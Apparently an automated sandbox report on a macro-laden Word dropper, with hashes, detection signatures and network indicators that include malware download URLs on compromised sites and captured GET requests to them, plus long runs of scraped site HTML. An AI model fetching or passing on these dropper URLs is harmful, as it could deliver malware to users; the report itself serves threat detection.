Analysis Report Informacion_29.doc

Overview

General Information

Sample Name: Informacion_29.doc
Analysis ID: 336937
MD5: 6c1cb4c06ead6f5ce29a931fa12410fa
SHA1: 4ac228fa54e73993dcccb69389a97cfcf67228b5
SHA256: 43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3

Most interesting Screenshot:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: Informacion_29.doc Virustotal: Detection: 62% Perma Link
Source: Informacion_29.doc ReversingLabs: Detection: 79%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: ??\C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219049704.00000000028F5000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb" source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdblog source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2219201518.0000000002B90000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wheelcomoving.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 58.97.195.135:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 66.85.46.76:80

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in memory: https://phawayagency.com/wp-admin/mXo4b/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></ QUICK AND EASY LOW CARB">The Ketonian Cookbook &#8211; QUICK AND EASY LOW C
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/" rel="bookmark" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/" rel="bookmark" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-eating-daniela-diaries/" rel="bookmark" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-programme-free-all-access-pass/" rel="bookmark" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/keto-full-day-of-eating-keto-bakes-biscuits-keto-chow/" rel="bookmark" title="Keto Full Day of Eating | Keto Bakes Biscuits | Keto Chow"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-Chow-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-Chow-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-Chow-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Keto Full Day of Eating | Keto Bakes Biscuits | Keto Chow"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/" rel="bookmark" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></span></a></div>
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: <script type="application/ld+json" class="yoast-schema-graph">{"
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: context":"https://schema.org","
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: graph":[{"
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: type":"WebSite","
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: id":"https://stage.thebestfikrah.com/#website","url":"https://stage.thebestfikrah.com/","name":"The Best Fikrah","description":"Think Right. Lead Well.","potentialAction":[{"
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: type":"SearchAction","target":"https://stage.thebestfikrah.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}</script>
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: type":"SearchAction","target":"https://stage.thebestfikrah.com/?s={search_term_string}","query-input":"required name=search_term_st
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: <img width="6413" height="914" alt="" loading="lazy" data-srcset="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png 6413w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-300x43.png 300w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png 1024w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-770x110.png 770w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1536x219.png 1536w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-2048x292.png 2048w" data-src="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png" data-sizes="(max-width: 6413px) 100vw, 6413px" class="attachment-full size-full lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img width="6413" height="914" src="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png" class="attachment-full size-full" alt="" loading="lazy" srcset="https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png 6413w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-300x43.png 300w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png 1024w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-770x110.png 770w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1536x219.png 1536w, https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-2048x292.png 2048w" sizes="(max-width: 6413px) 100vw, 6413px" /></noscript></div>
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: <div class="elementor-text-editor elementor-clearfix"><p><a href="https://thebestfikrah.com/about-us/">About us</a><br /><a href="https://thebestfikrah.com/foreword-founder/">Founder says</a><br /><a href="https://thebestfikrah.com/our-team/">Our team</a><br /><a href="https://thebestfikrah.com/terms-and-conditions/">Terms and conditions</a><br /><a href="https://thebestfikrah.com/privacy-policy/">Privacy Policy</a></p></div>
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in memory: <div class="elementor-text-editor elementor-clearfix"><p><a href="https://www.facebook.com/groups/thebestfikrah">Join us</a><br /><a href="https://thebestfikrah.com/contribute-your-writing/">Contribute</a><br /><a href="https://thebestfikrah.com/contact-us/">Contact us</a><br /><a href="https://thebestfikrah.com/sitemap_index.xml">Site Map</a></p></div>
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div>
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in memory: <li id="menu-item-1598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-1598"><a title="" href="https://wheelcomoving.com/">Home</a></li><li id="menu-item-2113" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2113"><a href="https://wheelcomoving.com/track-and-trace/">TRACK AND TRACE</a></li><li id="menu-item-1158" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/fOIlVX/ HTTP/1.1Host: thebestfikrah.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 66.85.46.76 66.85.46.76
Source: Joe Sandbox View IP Address: 70.32.23.58 70.32.23.58
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HOST4GEEKS-LLCUS HOST4GEEKS-LLCUS
Source: Joe Sandbox View ASN Name: SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY
Source: Joe Sandbox View ASN Name: GOOGLE-2US GOOGLE-2US
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABB8037-B28F-4AE5-86AD-026C320EA73C}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/fOIlVX/ HTTP/1.1Host: thebestfikrah.comConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.twitter.com (Twitter)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: <div class="elementor-text-editor elementor-clearfix"><p><a href="https://www.facebook.com/groups/thebestfikrah">Join us</a><br /><a href="https://thebestfikrah.com/contribute-your-writing/">Contribute</a><br /><a href="https://thebestfikrah.com/contact-us/">Contact us</a><br /><a href="https://thebestfikrah.com/sitemap_index.xml">Site Map</a></p></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: <a class="elementor-icon" href="https://www.facebook.com/thebestfikrah/"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: <a class="elementor-icon" href="https://www.youtube.com/channel/UCxY0oXl0BiKqF7iS16gHFhg"> equals www.youtube.com (Youtube)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: <a href="https://www.facebook.com/groups/thebestfikrah" class="elementor-button-link elementor-button elementor-size-xs elementor-animation-grow" role="button"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-103112"><a href="https://www.facebook.com/groups/thebestfikrah" class="elementor-item">Join us</a></li> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: src="https://www.facebook.com/tr?id=218352666062597&ev=PageView&noscript=1" /> equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: wheelcomoving.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Jan 2021 10:47:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveVary: Accept-EncodingKeep-Alive: timeout=5, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 17<!DOCTYPE html><html
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://00zyku.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in binary or memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: http://fonts.googleapis.com/css?family=Lato:100
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://fonts.googleapis.com/css?family=Work
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://html5shim.googlecode.com/svn/trunk/html5.js
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.5
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.5.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
